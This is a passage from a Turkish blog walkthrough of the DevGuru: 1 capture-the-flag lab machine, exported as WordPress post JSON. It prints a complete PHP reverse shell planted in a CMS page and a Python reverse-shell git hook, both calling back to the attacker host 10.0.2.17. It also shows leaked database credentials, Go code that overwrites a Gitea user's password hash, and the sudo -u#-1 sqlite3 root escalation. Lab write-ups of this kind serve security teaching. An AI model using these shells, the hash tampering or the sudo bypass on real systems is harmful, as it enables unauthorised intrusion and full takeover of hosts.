gobuster \u00e7\u0131kt\u0131lar\u0131nda http:\/\/10.0.2.18\/backend\/<\/a><\/strong> sayfas\u0131 tespit edilmi\u015fti. Burada \u015fifremi unuttum dedi\u011fimde frank kullan\u0131c\u0131s\u0131 ile i\u015flem yaparsam, frank'\u0131n ger\u00e7ekten bir kullan\u0131c\u0131 oldu\u011funu anlayabiliyordum. Sayfaya gidip frank:kuday<\/strong> kullan\u0131c\u0131 ad\u0131 ve parolas\u0131 ile giri\u015f yapt\u0131m. Harika!<\/p>\n
Bir CMS ile kar\u015f\u0131 kar\u015f\u0131yay\u0131z. Sayfalar\u0131n kaynak kodlar\u0131na bakt\u0131\u011f\u0131mda Blog Articles<\/strong> sayfas\u0131nda edit\u00f6r k\u0131sm\u0131nda a\u015fa\u011f\u0131daki php kodunu g\u00f6rd\u00fcm.<\/p>\n
function onStart()\n{\n    $this['bannerImage'] = $this->themeUrl('assets\/images\/blog-banner.jpg');\n}<\/code><\/pre>\n
Bu harika \u00e7\u00fcnk\u00fc art\u0131k reverse alabiliriz. Pentest Monkey'den php revers\u00fc\u00fcz var ancak baz\u0131 hatalarla kar\u015f\u0131la\u015ft\u0131m bende fonksiyon i\u00e7inde fonksiyon tan\u0131mlayamayaca\u011f\u0131ma g\u00f6re(ki asl\u0131nda tabiki tan\u0131mlan\u0131mlan\u0131rda konu d\u0131\u015f\u0131 ge\u00e7iyorum...) reverse shell kodumu biraz d\u00fczenledim ve Home<\/strong> sayfas\u0131na a\u015fa\u011f\u0131daki gibi ekledim.<\/p>\n
function onStart()\n{\n    set_time_limit (0);\n$VERSION = "1.0";\n$ip = '10.0.2.17';  \/\/ CHANGE THIS\n$port = 1822;       \/\/ CHANGE THIS\n$chunk_size = 1400;\n$write_a = null;\n$error_a = null;\n$shell = 'uname -a; w; id; \/bin\/sh -i';\n$daemon = 0;\n$debug = 0;\n\n\/\/\n\/\/ Daemonise ourself if possible to avoid zombies later\n\/\/\n\n\/\/ pcntl_fork is hardly ever available, but will allow us to daemonise\n\/\/ our php process and avoid zombies.  Worth a try...\nif (function_exists('pcntl_fork')) {\n    \/\/ Fork and have the parent process exit\n    $pid = pcntl_fork();\n\n    if ($pid == -1) {\n    \/\/  printit("ERROR: Can't fork");\n        exit(1);\n    }\n\n    if ($pid) {\n        exit(0);  \/\/ Parent exits\n    }\n\n    \/\/ Make the current process a session leader\n    \/\/ Will only succeed if we forked\n    if (posix_setsid() == -1) {\n    \/\/  printit("Error: Can't setsid()");\n        exit(1);\n    }\n\n    $daemon = 1;\n} else {\n\/\/  printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");\n}\n\n\/\/ Change to a safe directory\nchdir("\/");\n\n\/\/ Remove any umask we inherited\numask(0);\n\n\/\/\n\/\/ Do the reverse shell...\n\/\/\n\n\/\/ Open reverse connection\n$sock = fsockopen($ip, $port, $errno, $errstr, 30);\nif (!$sock) {\n    printit("$errstr ($errno)");\n    exit(1);\n}\n\n\/\/ Spawn shell process\n$descriptorspec = array(\n   0 => array("pipe", "r"),  \/\/ stdin is a pipe that the child will read from\n   1 => array("pipe", "w"),  \/\/ stdout is a pipe that the child will write to\n   2 => array("pipe", "w")   \/\/ stderr is a pipe that the child will write to\n);\n\n$process = proc_open($shell, $descriptorspec, $pipes);\n\nif (!is_resource($process)) {\n\/\/  printit("ERROR: Can't spawn shell");\n    exit(1);\n}\n\n\/\/ Set everything to non-blocking\n\/\/ Reason: Occsionally reads will block, even though stream_select tells us they won't\nstream_set_blocking($pipes[0], 0);\nstream_set_blocking($pipes[1], 0);\nstream_set_blocking($pipes[2], 0);\nstream_set_blocking($sock, 0);\n\n\/\/printit("Successfully opened reverse shell to $ip:$port");\n\nwhile (1) {\n    \/\/ Check for end of TCP connection\n    if (feof($sock)) {\n        \/\/printit("ERROR: Shell connection terminated");\n        break;\n    }\n\n    \/\/ Check for end of STDOUT\n    if (feof($pipes[1])) {\n        \/\/printit("ERROR: Shell process terminated");\n        break;\n    }\n\n    \/\/ Wait until a command is end down $sock, or some\n    \/\/ command output is available on STDOUT or STDERR\n    $read_a = array($sock, $pipes[1], $pipes[2]);\n    $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);\n\n    \/\/ If we can read from the TCP socket, send\n    \/\/ data to process's STDIN\n    if (in_array($sock, $read_a)) {\n        if ($debug) printit("SOCK READ");\n        $input = fread($sock, $chunk_size);\n        if ($debug) printit("SOCK: $input");\n        fwrite($pipes[0], $input);\n    }\n\n    \/\/ If we can read from the process's STDOUT\n    \/\/ send data down tcp connection\n    if (in_array($pipes[1], $read_a)) {\n        if ($debug) printit("STDOUT READ");\n        $input = fread($pipes[1], $chunk_size);\n        if ($debug) printit("STDOUT: $input");\n        fwrite($sock, $input);\n    }\n\n    \/\/ If we can read from the process's STDERR\n    \/\/ send data down tcp connection\n    if (in_array($pipes[2], $read_a)) {\n        if ($debug) printit("STDERR READ");\n        $input = fread($pipes[2], $chunk_size);\n        if ($debug) printit("STDERR: $input");\n        fwrite($sock, $input);\n    }\n}\n\nfclose($sock);\nfclose($pipes[0]);\nfclose($pipes[1]);\nfclose($pipes[2]);\nproc_close($process);\n\n}\n\n\/\/ Like print, but does nothing if we've daemonised ourself\n\/\/ (I can't figure out how to redirect STDOUT like a proper daemon)\nfunction printit ($string) {\n    if (!$daemon) {\n        print "$string\\n";\n    }\n}<\/code><\/pre>\n
Bu i\u015flem sonucunda dinleme noktam\u0131 a\u00e7t\u0131m ve reverse ald\u0131m.<\/p>\n
\u250c\u2500\u2500(root💀kali)-[~\/git-dumper\/devguru]\n\u2514\u2500# nc -lvp 1822                                                                                                                                                                                                                          1 \u2a2f\nlistening on [any] 1822 ...\nconnect to [10.0.2.17] from devguru.local [10.0.2.19] 52832\nLinux devguru.local 4.15.0-124-generic #127-Ubuntu SMP Fri Nov 6 10:54:43 UTC 2020 x86_64 x86_64 x86_64 GNU\/Linux\n 21:28:51 up  3:01,  0 users,  load average: 0.02, 0.06, 0.05\nUSER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT\nuid=33(www-data) gid=33(www-data) groups=33(www-data)\n\/bin\/sh: 0: can't access tty; job control turned off\n$ whoami\nwww-data\n$ pwd\n\/\n<\/code><\/pre>\n
\u0130\u00e7eride gezindi\u011fimde bir s\u00fcr\u00fc \u015fey ile u\u011fra\u015ft\u0131m bunlar\u0131n b\u00fcy\u00fck bir \u00e7o\u011funlu\u011fu yarars\u0131z \u015fey oldu. Herzaman yapt\u0131\u011f\u0131m gibi lse.sh scriptini tmp'in alt\u0131na att\u0131m ve \u00e7al\u0131\u015ft\u0131rd\u0131m. \u0130lgi \u00e7ekici sonu\u00e7lar a\u015fa\u011f\u0131da.<\/p>\n
[*] fst150 Looking for GIT\/SVN repositories................................ yes!\n---\n\/var\/www\/html\/themes\/business\/.git\n\/var\/www\/html\/.git\n---\n[!] fst160 Can we write to critical files?................................. nope\n<\/code><\/pre>\n
Yeni bir git projesi...<\/p>\n
---\n================================================================( network )=====\n[*] net000 Services listening only on localhost............................ yes!\n---\ntcp    LISTEN   0        80              127.0.0.1:3306           0.0.0.0:*     \ntcp    LISTEN   0        128             127.0.0.1:33327          0.0.0.0:*     \n---\n[!] net010 Can we sniff traffic with tcpdump?.............................. nope<\/code><\/pre>\n
Bana zaman kaybettiren bir k\u0131s\u0131m ve<\/p>\n
\n------ frank ------\n\nSTART      PID     USER COMMAND\n18:27      644    frank \/usr\/local\/bin\/gitea web --config \/etc\/gitea\/app.ini\n---\n[i] pro500 Running processes............................................... yes!\n<\/code><\/pre>\n
As\u0131l odaklanmam\u0131z gereken k\u0131s\u0131m... gitea projesi frank taraf\u0131ndan \u00e7al\u0131\u015ft\u0131r\u0131l\u0131yor. Gezinmelerim esnas\u0131nda app.ini<\/strong> dosyas\u0131n\u0131n \/var\/backup<\/strong> klas\u00f6r\u00fc alt\u0131nda g\u00f6rm\u00fc\u015ft\u00fcm ve okuyabiliyordum. Dosyay\u0131 okudu\u011fumda yeni bir mysql kullan\u0131c\u0131 buldum. \u0130\u015fte dosyan\u0131n ilgili k\u0131sm\u0131:<\/p>\n
\n[database]\n; Database to use. Either "mysql", "postgres", "mssql" or "sqlite3".\nDB_TYPE             = mysql\nHOST                = 127.0.0.1:3306\nNAME                = gitea\nUSER                = gitea\n; Use PASSWD = `your password` for quoting if you use special characters in the password.\nPASSWD              = UfFPTF8C8jjxVF2m\n; For Postgres, schema to use if different from "public". The schema must exist beforehand,\n; the user must have creation privileges on it, and the user search path must be set\n; to the look into the schema first. e.g.:ALTER USER user SET SEARCH_PATH = schema_name,"$user",public;\nSCHEMA              = \n; For Postgres, either "disable" (default), "require", or "verify-full"\n--More--(41%)\n<\/code><\/pre>\n
Kullan\u0131c\u0131 ad\u0131m\u0131z \u00e7ok iyi de\u011fil mi?<\/p>\n
gitea:UfFPTF8C8jjxVF2m<\/code><\/pre>\n
Bununn \u00fczerine http:\/\/10.0.2.19\/adminer.php?server=localhost<\/a><\/strong> adresinde bu kullan\u0131c\u0131 olarak giri\u015f yapt\u0131m. gitea<\/strong> isimli bir db ile kar\u015f\u0131la\u015ft\u0131m ve yine user bulabilece\u011fim bir tablo arad\u0131m. user<\/strong> tablosuna geldi\u011fimde i\u00e7eride kay\u0131tl\u0131 bir kullan\u0131c\u0131 g\u00f6rd\u00fcm. Ad\u0131 yine frank. Password'\u00fcn hash'ini anlamad\u0131m ancak yan\u0131nda pbkdf2<\/strong> oldu\u011fu yaz\u0131yordu. Ayr\u0131ca tabbloda hash i\u00e7in salt<\/strong> k\u0131sm\u0131da (Bop8nwtUiM) mevcuttu.<\/p>\n
Uzun s\u00fcre bir\u015feyler yapmay\u0131 denedim ancak ba\u015far\u0131l\u0131 olamad\u0131m. Bunun \u00fczerine gitea projesini incelemeye ba\u015flad\u0131m. Sonu\u00e7 olarak ayn\u0131 mant\u0131kla hash'in \u00fcst\u00fcne yazabiliriz. Sadece nas\u0131l \u00e7al\u0131\u015ft\u0131\u011f\u0131n\u0131 bulmam gerekiyor.<\/p>\n
gitea projesini buldum ve indirdim. A\u015fa\u011f\u0131daki gibi bir arama yapt\u0131\u011f\u0131mda istedi\u011fim k\u0131sma geldim.<\/p>\n
\n\u250c\u2500\u2500(root💀kali)-[~]\n\u2514\u2500# git clone https:\/\/github.com\/go-gitea\/gitea.git\nCloning into 'gitea'...\nremote: Enumerating objects: 148698, done.\nremote: Counting objects: 100% (1116\/1116), done.\nremote: Compressing objects: 100% (565\/565), done.\nremote: Total 148698 (delta 583), reused 873 (delta 513), pack-reused 147582\nReceiving objects: 100% (148698\/148698), 200.34 MiB | 1.33 MiB\/s, done.\nResolving deltas: 100% (101253\/101253), done.\n\n\u250c\u2500\u2500(root💀kali)-[~]\n\n\u2500\u2500(root💀kali)-[~]\n\u2514\u2500# grep -r "pbkdf2" gitea \ngitea\/docs\/content\/doc\/advanced\/config-cheat-sheet.en-us.md:- `PASSWORD_HASH_ALGO`: **pbkdf2**: The hash algorithm to use \\[argon2, pbkdf2, scrypt, bcrypt\\], argon2 will spend more memory than others.\ngitea\/go.sum:github.com\/xdg-go\/pbkdf2 v1.0.0\/go.mod h1:jrpuAogTd400dnrH08LKmI\/xc1MbPOebTwRqcT5RDeI=\ngitea\/vendor\/modules.txt:golang.org\/x\/crypto\/pbkdf2\ngitea\/vendor\/github.com\/go-openapi\/strfmt\/go.sum:github.com\/xdg-go\/pbkdf2 v1.0.0\/go.mod h1:jrpuAogTd400dnrH08LKmI\/xc1MbPOebTwRqcT5RDeI=\ngitea\/vendor\/github.com\/couchbase\/goutils\/scramsha\/scramsha.go: "golang.org\/x\/crypto\/pbkdf2"\ngitea\/vendor\/github.com\/couchbase\/goutils\/scramsha\/scramsha.go: s.saltedPassword = pbkdf2.Key([]byte(pass), s.salt, s.i,\ngitea\/vendor\/golang.org\/x\/crypto\/pbkdf2\/pbkdf2.go:Package pbkdf2 implements the key derivation function PBKDF2 as defined in RFC\ngitea\/vendor\/golang.org\/x\/crypto\/pbkdf2\/pbkdf2.go:pbkdf2.Key.\ngitea\/vendor\/golang.org\/x\/crypto\/pbkdf2\/pbkdf2.go:package pbkdf2 \/\/ import "golang.org\/x\/crypto\/pbkdf2"\ngitea\/vendor\/golang.org\/x\/crypto\/pbkdf2\/pbkdf2.go:\/\/    dk := pbkdf2.Key([]byte("some password"), salt, 4096, 32, sha1.New)\ngitea\/vendor\/golang.org\/x\/crypto\/scrypt\/scrypt.go:  "golang.org\/x\/crypto\/pbkdf2"\ngitea\/vendor\/golang.org\/x\/crypto\/scrypt\/scrypt.go:  b := pbkdf2.Key(password, salt, 1, p*128*r, sha256.New)\ngitea\/vendor\/golang.org\/x\/crypto\/scrypt\/scrypt.go:  return pbkdf2.Key(password, b, 1, keyLen, sha256.New), nil\ngitea\/modules\/setting\/setting.go:   PasswordHashAlgo = sec.Key("PASSWORD_HASH_ALGO").MustString("pbkdf2")\ngitea\/modules\/context\/context.go:   "golang.org\/x\/crypto\/pbkdf2"\ngitea\/modules\/context\/context.go:   key := pbkdf2.Key([]byte(secret), []byte(secret), 1000, 16, sha256.New)\ngitea\/modules\/context\/context.go:   key := pbkdf2.Key([]byte(secret), []byte(secret), 1000, 16, sha256.New)\ngitea\/models\/migrations\/v71.go: "golang.org\/x\/crypto\/pbkdf2"\ngitea\/models\/migrations\/v71.go: tempHash := pbkdf2.Key([]byte(token), []byte(salt), 10000, 50, sha256.New)\ngitea\/models\/migrations\/v124.go:        PasswdHashAlgo string      `xorm:"NOT NULL DEFAULT 'pbkdf2'"`\ngitea\/models\/migrations\/v166.go:    "golang.org\/x\/crypto\/pbkdf2"\ngitea\/models\/migrations\/v166.go:        algoPbkdf2 = "pbkdf2"\ngitea\/models\/migrations\/v166.go:            tempPasswd = pbkdf2.Key([]byte(passwd), []byte(salt), 10000, 50, sha256.New)\ngitea\/models\/user_test.go:  algos := []string{"argon2", "pbkdf2", "scrypt", "bcrypt"}\ngitea\/models\/twofactor.go:  "golang.org\/x\/crypto\/pbkdf2"\ngitea\/models\/twofactor.go:  tempHash := pbkdf2.Key([]byte(token), []byte(salt), 10000, 50, sha256.New)\ngitea\/models\/user.go:   "golang.org\/x\/crypto\/pbkdf2"\ngitea\/models\/user.go:   algoPbkdf2 = "pbkdf2"\ngitea\/models\/user.go:       tempPasswd = pbkdf2.Key([]byte(passwd), []byte(salt), 10000, 50, sha256.New)\ngrep: gitea\/.git\/index: binary file matches\ngitea\/custom\/conf\/app.example.ini:;; Password Hash algorithm, either "argon2", "pbkdf2", "scrypt" or "bcrypt"\ngitea\/custom\/conf\/app.example.ini:;PASSWORD_HASH_ALGO = pbkdf2\ngitea\/CHANGELOG.md:  * Turn default hash password algorithm back to pbkdf2 from argon2 until we find a better one (#14673) (#14675)\n<\/code><\/pre>\n
Bunun \u00fczerine gitea\/models\/user.go<\/strong> dosyas\u0131nda aa\u011f\u0131daki gibi bir fonksyion buldum.<\/p>\n
\n   317  func hashPassword(passwd, salt, algo string) string {\n   318      var tempPasswd []byte\n\n   319      switch algo {\n   320      case algoBcrypt:\n   321          tempPasswd, _ = bcrypt.GenerateFromPassword([]byte(passwd), bcrypt.DefaultCost)\n   322          return string(tempPasswd)\n   323      case algoScrypt:\n   324          tempPasswd, _ = scrypt.Key([]byte(passwd), []byte(salt), 65536, 16, 2, 50)\n   325      case algoArgon2:\n   326          tempPasswd = argon2.IDKey([]byte(passwd), []byte(salt), 2, 65536, 8, 50)\n   327      case algoPbkdf2:\n   328          fallthrough\n   329      default:\n   330          tempPasswd = pbkdf2.Key([]byte(passwd), []byte(salt), 10000, 50, sha256.New)\n   331      }\n\n   332      return fmt.Sprintf("%x", tempPasswd)\n   333  }\n<\/code><\/pre>\n
Harika i\u015fte arad\u0131\u011f\u0131m\u0131z! Online bir git edit\u00f6r ile hemen parolam\u0131 hashledim. Bunun i\u00e7in ben https:\/\/play.golang.org\/<\/a> adresini kulland\u0131m. Kodum a\u015fa\u011f\u0131da:<\/p>\n
package main\n\nimport (\n    "fmt"\n    "golang.org\/x\/crypto\/pbkdf2"\n    "crypto\/sha256"\n)\n\nfunc main() {\n    var tempPasswd []byte\n    tempPasswd = pbkdf2.Key([]byte("kuday"), []byte("Bop8nwtUiM"), 10000, 50, sha256.New)\n    fmt.Println(fmt.Sprintf("%x", tempPasswd))\n}<\/code><\/pre>\n
\u00c7\u0131kt\u0131:771aee7c9c8fa90d9f31e9edd43327c71225305c63ea03e320f7bfa9999084ab41731a28a32b3e7aab247553738f6eac351b<\/strong><\/p>\n
\u015eimdi bunu de\u011fi\u015ftirelim. Ayn\u0131 mant\u0131kla kullan\u0131c\u0131 \u015fifresini de\u011fi\u015ftirdim ve art\u0131k 8585'te \u00e7al\u0131\u015fan gitea projesine frank kullan\u0131c\u0131s\u0131 ile giri\u015f yapabildim.<\/p>\n
\u015eimdi biraz ge\u00e7mi\u015fi ha\u0131rlayal\u0131m. Bu projeyi zaten hedef sunucudaki frank \u00e7al\u0131\u015ft\u0131r\u0131yordu. Yapt\u0131\u011f\u0131m incelemelerde makinede python3 y\u00fckl\u00fc.<\/p>\n
frank:kuday kullan\u0131c\u0131 ad\u0131 ve parolas\u0131 ile http:\/\/10.0.2.19:8585\/user\/login?redirect_to<\/a>=<\/strong> adresine giri\u015f yapt\u0131m.<\/p>\n
Art\u0131k proje kar\u015f\u0131mdayd\u0131. Bunun \u00fczerine bir hook eklemek istedim. git hook'un ne oldu\u011funu bilmiyorsan\u0131z k\u0131saca \u00f6zel i\u015flemler yapmak i\u00e7in kullan\u0131lan dosyalar dyebiliriz. Bir hook ekleyece\u011fim daha sonra projeye yeni commit girip hook'u tetikleyece\u011fim.<\/p>\n
http:\/\/10.0.2.19:8585\/frank\/devguru-website\/settings\/hooks\/git\/pre-receive<\/a><\/strong> adresine gidip a\u015fa\u011f\u0131daki reverse shell'imi girdim.<\/p>\n
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.2.17",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("\/bin\/bash")'\n<\/code><\/pre>\n
Not:<\/strong>\u0130lk ba\u015fta nc ile reverse almay\u0131 denedim ancak hata verdi. <\/p>\n
Daha sonras\u0131nda update hook dedim. \u015eimdi projeye gelelim. ve bir commit girelim. Ben hemen README.MD dosyas\u0131na #kuday<\/code> gibi bir ifade ekledim ve commitledim. commit ncesi ve sonras\u0131na a\u015fa\u011f\u0131da terminal ekran\u0131mdan kan\u0131tlayayim hemen.<\/p>\n
\u250c\u2500\u2500(root💀kali)-[~\/git-dumper\/devguru\/devguru-website]\n\u2514\u2500# git log \ncommit a04aebca813581d4abd036451217393070ed7e95 (HEAD -> master)\nAuthor: Your Name <you@example.com>\nDate:   Tue Jun 29 18:47:43 2021 -0400\n\n    kuday\n\ncommit 7de9115700c5656c670b34987c6fbffd39d90cf2 (origin\/master, origin\/HEAD)\nAuthor: frank <frank@devguru.local>\nDate:   Thu Nov 19 18:42:03 2020 -0600\n\n    first commit\n<\/code><\/pre>\n
Projeyi isterseniz terminal \u00fczerinde de commit'leyebilirsiniz tabikide...<\/p>\n
Bu i\u015flemi yapt\u0131\u011f\u0131m\u0131zda \u00f6nceden a\u00e7t\u0131\u011f\u0131m\u0131z dinleme noktas\u0131na \u00e7oktan reverse gelmi\u015fti.<\/p>\n
\u250c\u2500\u2500(root💀kali)-[~\/git-dumper\/devguru]\n\u2514\u2500# nc -lvp 9999                                                                                                                                                                                                                          1 \u2a2f\nlistening on [any] 9999 ...\nconnect to [10.0.2.17] from devguru.local [10.0.2.19] 48700\nfrank@devguru:~\/gitea-repositories\/frank\/devguru-website.git$ whoami\nwhoami\nfrank\nfrank@devguru:~\/gitea-repositories\/frank\/devguru-website.git$ <\/code><\/pre>\n
frank kullan\u0131c\u0131 ilede baz\u0131 incelemeler yapt\u0131m.<\/p>\n
\nfrank@devguru:~\/gitea-repositories\/frank\/devguru-website.git$ sudo -V\nsudo -V\nSudo version 1.8.21p2\nSudoers policy plugin version 1.8.21p2\nSudoers file grammar version 46\nSudoers I\/O plugin version 1.8.21p2\nfrank@devguru:~\/gitea-repositories\/frank\/devguru-website.git$ \n\nfrank@devguru:~\/gitea-repositories\/frank\/devguru-website.git$ \n\nfrank@devguru:~\/gitea-repositories\/frank\/devguru-website.git$ sudo -l\nsudo -l\nMatching Defaults entries for frank on devguru:\n    env_reset, mail_badpass,\n    secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin\n\nUser frank may run the following commands on devguru:\n    (ALL, !root) NOPASSWD: \/usr\/bin\/sqlite3<\/code><\/pre>\n
sudo s\u00fcr\u00fcm\u00fcnde s\u0131k\u0131nt\u0131 var bunu https:\/\/www.sudo.ws\/alerts\/minus_1_uid.html<\/a><\/strong> adresinden de okuyabilirsiniz k\u0131sca \u015f\u00f6yle a\u00e7\u0131klayayim. root haricinde \u015fifresiz bir \u015fekilde sqlite3 kullanilece\u011fimziis\u00f6ylemi\u015f sudo i\u00e7in sudo -u#-1<\/code> ifadesi sudo -u root<\/code> anlam\u0131nda gelmektedir. Bu hata 1.8.28. de d\u00fczeltilmi\u015f. E o zaman hadi root'a.<\/p>\n
\nfrank@devguru:~\/gitea-repositories\/frank\/devguru-website.git$ sudo -u#-1 sqlite3 \/dev\/null '.shell \/bin\/sh'\n<.git$ sudo -u#-1 sqlite3 \/dev\/null '.shell \/bin\/sh'          \n# whoami\nwhoami\nroot\n# cd \/root\ncd \/root\n# ls\nls\nmsg.txt  root.txt\n# cat root.txt\ncat root.txt\n96440606fb88aa7497cde5a8e68daf8f\n# cat msg.txt\ncat msg.txt\n\n       Congrats on rooting DevGuru!\n  Contact me via Twitter @zayotic to give feedback!\n\n# \n<\/code><\/pre>\n
G\u00fczel makine!<\/p>\n","protected":false},"excerpt":{"rendered":"
Makine Hakk\u0131nda Bilgiler A\u00e7\u0131klama: DevGuru is a fictional web development company hiring you for a pentest assessment. You have been tasked with finding vulnerabilities on…<\/p>\n
Devam\u0131n\u0131 okuDEVGURU: 1<\/span><\/a><\/div>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[498],"tags":[551,548,549,550,504],"class_list":["post-1277","post","type-post","status-publish","format-standard","hentry","category-walkthrough","tag-bcrypt","tag-git","tag-git_dumper","tag-pbkdf2","tag-sudo","entry"],"_links":{"self":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1277","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/comments?post=1277"}],"version-history":[{"count":1,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1277\/revisions"}],"predecessor-version":[{"id":1278,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1277\/revisions\/1278"}],"wp:attachment":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/media?parent=1277"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/categories?post=1277"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/tags?post=1277"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}